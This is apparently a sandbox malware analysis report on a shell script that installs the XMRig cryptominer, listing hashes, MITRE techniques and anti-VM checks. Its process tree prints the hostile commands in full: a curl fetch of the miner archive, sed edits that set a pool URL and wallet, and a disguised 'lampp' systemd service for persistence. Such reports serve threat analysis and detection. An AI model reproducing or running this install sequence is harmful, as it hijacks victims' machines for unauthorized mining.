xmrig | d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd

Analysis

max time kernel
1s
max time network
128s
platform
ubuntu-22.04_amd64
resource
ubuntu2204-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
submitted
01/07/2024, 12:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

script.sh
Size

8KB
MD5

97423634cc1762b2f010cb860e7fb47d
SHA1

2f50775e8fe9ab98a80f06d835c5874091bf0b3e
SHA256

d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd
SHA512

bd5279178f713edaca1754937a859fa41dbec1fdd15c8ad3cb11894142e389d97bf3ca7f0402c018a616053b1121650ed609498a4b34c4def829e02924f6de1f
SSDEEP

192:fFa1ZIJvH8czpCyzdpB3f1SAij8E3YUNvmTC8KfbmP/oYv0Yd:fEHexC+HSAHE3YUN+TC8SbmQUfd

Score

10^/10

xmrig antivm miner

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral3/files/fstream-2.dat	family_xmrig
behavioral3/files/fstream-2.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Executes dropped EXE 1 IoCs

ioc	pid	Process
/root/lampp/xmrig	1594	xmrig

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/product_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	xmrig

Enumerates running processes
Discovers information about currently running processes on the system

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com
4	raw.githubusercontent.com

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_name	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_version	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	xmrig
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	xmrig

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
File opened for reading	/proc/cpuinfo	xmrig

Reads CPU attributes 1 TTPs 45 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/physical_package_id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index5/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/cluster_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/die_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/topology/package_cpus	xmrig
File opened for reading	/sys/devices/system/cpu/possible	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/type	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/level	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	xmrig
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	xmrig

Enumerates kernel/hardware configuration 1 TTPs 24 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_latency	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_latency	xmrig
File opened for reading	/sys/devices/virtual/dmi/id	xmrig
File opened for reading	/sys/devices/system/node/node0/cpumap	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/write_bandwidth	xmrig
File opened for reading	/sys/devices/cpu_atom/cpus	xmrig
File opened for reading	/sys/devices/system/node/node0/access1/initiators	xmrig
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	xmrig
File opened for reading	/sys/devices/system/cpu	xmrig
File opened for reading	/sys/devices/cpu_core/cpus	xmrig
File opened for reading	/sys/devices/system/node/node0/meminfo	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators	xmrig
File opened for reading	/sys/bus/soc/devices	xmrig
File opened for reading	/sys/fs/cgroup/cgroup.controllers	xmrig
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	xmrig
File opened for reading	/sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages	xmrig
File opened for reading	/sys/devices/system/node/online	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages	xmrig
File opened for reading	/sys/bus/dax/devices	xmrig
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	xmrig
File opened for reading	/sys/kernel/mm/hugepages	xmrig
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	xmrig

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/16/stat	killall
File opened for reading	/proc/17/stat	killall
File opened for reading	/proc/73/stat	killall
File opened for reading	/proc/101/stat	killall
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/1167/stat	killall
File opened for reading	/proc/1511/stat	killall
File opened for reading	/proc/filesystems	mkdir
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/585/stat	killall
File opened for reading	/proc/713/stat	killall
File opened for reading	/proc/1096/stat	killall
File opened for reading	/proc/1160/stat	killall
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/589/stat	killall
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/7/stat	killall
File opened for reading	/proc/mounts	xmrig
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/22/stat	killall
File opened for reading	/proc/218/stat	killall
File opened for reading	/proc/1172/stat	killall
File opened for reading	/proc/81/stat	killall
File opened for reading	/proc/705/stat	killall
File opened for reading	/proc/1289/stat	killall
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/20/stat	killall
File opened for reading	/proc/26/stat	killall
File opened for reading	/proc/507/stat	killall
File opened for reading	/proc/587/stat	killall
File opened for reading	/proc/1057/stat	killall
File opened for reading	/proc/1199/stat	killall
File opened for reading	/proc/80/stat	killall
File opened for reading	/proc/215/stat	killall
File opened for reading	/proc/588/stat	killall
File opened for reading	/proc/1159/stat	killall
File opened for reading	/proc/1161/stat	killall
File opened for reading	/proc/1315/stat	killall
File opened for reading	/proc/1163/stat	killall
File opened for reading	/proc/110/stat	killall
File opened for reading	/proc/629/stat	killall
File opened for reading	/proc/682/stat	killall
File opened for reading	/proc/1351/stat	killall
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/15/stat	killall
File opened for reading	/proc/1376/stat	killall
File opened for reading	/proc/1580/stat	killall
File opened for reading	/proc/1243/stat	killall
File opened for reading	/proc/1619/stat	killall
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/95/stat	killall
File opened for reading	/proc/113/stat	killall
File opened for reading	/proc/1162/stat	killall
File opened for reading	/proc/90/stat	killall
File opened for reading	/proc/1036/stat	killall
File opened for reading	/proc/224/stat	killall
File opened for reading	/proc/729/stat	killall
File opened for reading	/proc/1144/stat	killall
File opened for reading	/proc/1323/stat	killall
File opened for reading	/proc/1491/stat	killall
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/660/stat	killall

Writes file to tmp directory 2 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/lampp.service	script.sh
File opened for modification	/tmp/xmrig.tar.gz	curl

/tmp/script.sh
/tmp/script.sh
1⤵
- Writes file to tmp directory
PID:1569
- /usr/bin/cut
  cut -f1 -d.
  2⤵
  PID:1572
- /usr/bin/nproc
  nproc
  2⤵
  PID:1573
- /usr/bin/bc
  bc -l
  2⤵
  PID:1576
- /usr/bin/curl
  curl -L --progress-bar https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz
  2⤵
  - Writes file to tmp directory
  PID:1577
- /usr/bin/mkdir
  mkdir /root/lampp
  2⤵
  - Reads runtime system information
  PID:1589
- /usr/bin/tar
  tar xf /tmp/xmrig.tar.gz -C /root/lampp
  2⤵
  - Reads runtime system information
  PID:1590
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:1591
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:1591
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:1591
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:1591
- /usr/bin/rm
  rm /tmp/xmrig.tar.gz
  2⤵
  PID:1592
- /usr/bin/sed
  sed -i "s/\"donate-level\": *[^,]*,/\"donate-level\": 1,/" /root/lampp/config.json
  2⤵
  PID:1593
- /root/lampp/xmrig
  /root/lampp/xmrig --help
  2⤵
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:1594
- /usr/bin/sed
  sed -r "s/[^a-zA-Z0-9\\-]+/_/g"
  2⤵
  PID:1599
- /usr/bin/cut
  cut -f1 -d.
  2⤵
  PID:1598
- /usr/bin/hostname
  hostname
  2⤵
  PID:1597
- /usr/bin/sed
  sed -i "s/\"url\": *\"[^\"]*\",/\"url\": \"gulf.moneroocean.stream:10001\",/" /root/lampp/config.json
  2⤵
  PID:1600
- /usr/bin/sed
  sed -i "s/\"user\": *\"[^\"]*\",/\"user\": \"47zZneDdPNr63HM9ubMyrhYvLNbDunCkiia6fNCvQkThNuK6rrj59e3Y2nNF3ETeewbALAGYaiti4SF4ENwJ8bR7PKXXcMN\",/" /root/lampp/config.json
  2⤵
  PID:1601
- /usr/bin/sed
  sed -i "s/\"pass\": *\"[^\"]*\",/\"pass\": \"ubuntu2204-amd64-20240611-en-1\",/" /root/lampp/config.json
  2⤵
  PID:1602
- /usr/bin/sed
  sed -i "s/\"max-cpu-usage\": *[^,]*,/\"max-cpu-usage\": 100,/" /root/lampp/config.json
  2⤵
  PID:1603
- /usr/bin/sed
  sed -i "s/\"max-threads-hint\": *[^,]*,/\"max-threads-hint\": 100,/" /root/lampp/config.json
  2⤵
  PID:1604
- /usr/bin/sed
  sed -i "s#\"log-file\": *null,#\"log-file\": \"/root/lampp/xmrig.log\",#" /root/lampp/config.json
  2⤵
  PID:1605
- /usr/bin/sed
  sed -i "s/\"syslog\": *[^,]*,/\"syslog\": true,/" /root/lampp/config.json
  2⤵
  PID:1606
- /usr/bin/cp
  cp /root/lampp/config.json /root/lampp/config_background.json
  2⤵
  - Reads runtime system information
  PID:1607
- /usr/bin/sed
  sed -i "s/\"background\": *false,/\"background\": true,/" /root/lampp/config_background.json
  2⤵
  PID:1608
- /usr/bin/cat
  cat
  2⤵
  PID:1609
- /usr/bin/chmod
  chmod +x /root/lampp/miner.sh
  2⤵
  PID:1610
- /usr/bin/sudo
  sudo -n true
  2⤵
  PID:1611
- - /usr/bin/true
    true
    3⤵
    PID:1612
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  - Reads runtime system information
  PID:1615
- /usr/bin/grep
  grep MemTotal /proc/meminfo
  2⤵
  PID:1614
- /usr/bin/cat
  cat
  2⤵
  PID:1616
- /usr/bin/sudo
  sudo mv /tmp/lampp.service /etc/systemd/system/lampp.service
  2⤵
  - Reads runtime system information
  PID:1617
- - /usr/bin/mv
    mv /tmp/lampp.service /etc/systemd/system/lampp.service
    3⤵
    - Reads runtime system information
    PID:1618
- /usr/bin/sudo
  sudo killall xmrig
  2⤵
  - Reads runtime system information
  PID:1619
- - /usr/bin/killall
    killall xmrig
    3⤵
    - Reads runtime system information
    PID:1620
- /usr/bin/sudo
  sudo systemctl daemon-reload
  2⤵
  - Reads runtime system information
  PID:1621
- - /usr/bin/systemctl
    systemctl daemon-reload
    3⤵
    PID:1622
- /usr/bin/sudo
  sudo systemctl enable lampp.service
  2⤵
  - Reads runtime system information
  PID:1656
- - /usr/bin/systemctl
    systemctl enable lampp.service
    3⤵
    - Reads runtime system information
    PID:1657
- /usr/bin/sudo
  sudo systemctl start lampp.service
  2⤵
  PID:1693
- - /usr/bin/systemctl
    systemctl start lampp.service
    3⤵
    - Reads runtime system information
    PID:1694

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/root/lampp/config.json

Filesize
2KB

MD5
f3294129e6b76283965ad86a815bf383

SHA1
5fe0ab538f86962efe82cb13fc2da745610740af

SHA256
578386126ae451940ff5c21ce95b4e3be85c2d33160d6e739ed0ebbd206c7e81

SHA512
07a280be17282096ed8c319623d2e02e088e80d69e3d6d24ecaef5bedf624d006dc4963b8b1a6c0569a3c9221786bfd7cd462dddebcfcbed7879fd994b4c8333

Download Submit
/root/lampp/miner.sh

Filesize
253B

MD5
f96a321a262287ceae164f23f232ed9c

SHA1
d1eeab41f244b42377afd7cc3de7428736162b24

SHA256
f572e87f0fc93c5a62023a572cf4c797c942d7618167752779854d6f73efa012

SHA512
75fc451b1f3138dbecd907ba5af2246884582190f85b4f574a99696439a3d6839c34a9310d21d206148870c7e6e7604a7ebd8bbd23406c57c6c6346fcb9cc86e

Download Submit
/root/lampp/sedFpEzxy

Filesize
2KB

MD5
3f9e732061567666d7168bff892fd0a7

SHA1
f7f73a3e10bf3c175694011aa48c377396e5e65a

SHA256
56d136b6a08a4795230bb3b05a529da2678a72618d0e7da6645eb8bda6ed298b

SHA512
24b62a35c6f66db00b2d16b98da8c8dc4edb68eefdf86a79ac707a71e5eb9149a319eed0a587338bf68d0c294436193e4f347a9d28ac528d2bf33e322f2e66f2

Download Submit
/root/lampp/sedLX1y9h

Filesize
2KB

MD5
d489ddbbb83271e967b8af615d17d3c7

SHA1
f0394a367a60e9727269882154098dec802774ef

SHA256
5cf89bb7fbef53cc5fbe582017145aa148ad8a8abc5bceee9f887ba4a6fcc46e

SHA512
aba9bf29076f1d5b6e81c83e5be1cee5934d23db9093ec3ea8b4d92b521e37e58d80aaea6248dc211544574f3772df990950b9236f40e863a76220f86b157954

Download Submit
/root/lampp/sedPVDp19

Filesize
2KB

MD5
1006dec1464063b07aadf3c2f02324be

SHA1
dbe7eaea7465a137757288e333d6f257c3a722b6

SHA256
cb7de4ccc8f90cd2f716d93a102e243d0ed9fd04366b61b796221320348b72e1

SHA512
3c1654557262edac1ee9fdd91032124bad5a9ea2aea431576d01aca742bbc1e4b4c74873ca5d88118d5382c08eec1082de090fdececced29388c497d57496ba4

Download Submit
/root/lampp/sedlot9TP

Filesize
2KB

MD5
77a17722e6f75840565e2db01a5c4973

SHA1
18900fdb137e51b8f129be5e70a5462f1e3f9b50

SHA256
4cad1ad0a6dabf6f8d00c01ad7db3a79cf781930faae6dc439e7a716d664f6c0

SHA512
05958671780c90f253cec6eaaa1fa5954abbfcba965801f4c241de6796afe910a5401525aac6d0da46a0418e31f3bc5ea0efc22287977b88dc57b0900fad1a07

Download Submit
/root/lampp/sedltdeGT

Filesize
2KB

MD5
9c950471bf1bf4726b8557fd7dd500bf

SHA1
a6b1b01974188a831fcfd0b2e3023447eca1b494

SHA256
4b79f6a98133d373a2d1ff4fd784d78a3b44068dfdba3867dfd2c8dc9213fc74

SHA512
247ac1555eabc0a028bd4ca3891ef780da9db6b61e0221a9c37cfcb40c892d4d0bc05070805faf8b7ffce287aa42bf21df9b83a2d7aaf433ab1bd114a2670957

Download Submit
/root/lampp/sedoAwGhh

Filesize
2KB

MD5
8b11b027dd187104473ee7d661ffe25f

SHA1
ec46117e3b0c2ce9f7fe60ac51eb1861c49e97ef

SHA256
984513d85c8a81fbca982bd8c81a73344f39a4fe46bd9b982ed85c0ff6d1030f

SHA512
1078b6b53897534be9f070454b8545f8075017025f9252175cfc6651c7eb11a906230558daa22a1086790f5fd5fed43b9b1909b044c70fafae9aba2d99381ea2

Download Submit
/root/lampp/xmrig

Filesize
8.4MB

MD5
e6b2f9d13d45c128b44cb5405df9ab39

SHA1
c07326f69240e3d22d134d156528af3bd5d0497b

SHA256
96462c80ee4118a9140b159d5bbf5f3a40a8693d650919e29b23bd3c9c7e4162

SHA512
4eef70930aae075d38a871c380b2d1322c5a3cfdfdd6e936447e384bfd6c3f71b4ad7a9dc1dd2213a946f32681686f0db0b6f6e1caf1286a0a7fe36a26ac5632

Download Submit
/tmp/lampp.service

Filesize
177B

MD5
540c899b78585827e807a62f7345eaf5

SHA1
8bf3146889c6b15811f226bff9fbca24d184eff2

SHA256
b32af10b7911d7113a1fe52ef467e7f123fb26552cae752ba52aef684b301fcf

SHA512
0aac2aced9505d1bde7d6c2fb6166a341982e9a170e7f0f72ede35c1305c4519e2fb07a7658558b41ad319c3d102f07d667a8769ff659b6392c81698d278af46

Download Submit
/tmp/xmrig.tar.gz

Filesize
3.4MB

MD5
e003a3ec8bdd61151a61cadf950502c4

SHA1
2606bd45a8d45092c7d2c0ac9d6e92ec7ef7950e

SHA256
80b1dc6f56a95273420dc96e837d7e1a9f42c057e319dadac0cccee4425319e0

SHA512
ef80c71d8b0d09128abf9e67fe12a8cd843500419da43e7a284e016029391d826c503aeec3073a2b3d7d90ba24f18990edf6965cd38a270bbe57f20c6be022f9

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads